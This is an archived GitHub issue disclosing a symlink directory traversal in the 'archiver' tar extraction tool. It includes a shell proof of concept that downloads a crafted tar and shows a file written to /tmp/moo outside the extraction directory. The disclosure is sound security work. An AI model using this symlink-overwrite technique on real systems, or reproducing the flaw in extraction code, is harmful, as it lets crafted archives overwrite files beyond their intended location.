This repository was archived by the owner on Nov 19, 2024. It is now read-only.
This repository was archived by the owner on Nov 19, 2024. It is now read-only.
Directory traversal through symlink #69
Description
Archiver is not careful enough when unpacking tar archives that contain symlinks. It will happily write over a symlink it previously created. This could cause directory traversal.
Proof of concept:
$ wget -q https://github.com/jwilk/path-traversal-samples/releases/download/0/symlink.tar -O traversal.tar
$ tar -tvvf traversal.tar
lrwxrwxrwx root/root 0 2018-06-05 16:55 moo -> /tmp/moo
-rw-r--r-- root/root 4 2018-06-05 16:55 moo
$ pwd
/home/jwilk
$ ls /tmp/moo
ls: cannot access '/tmp/moo': No such file or directory
$ archiver open traversal.tar
$ ls /tmp/moo
/tmp/mooTested with git master (e4ef56d).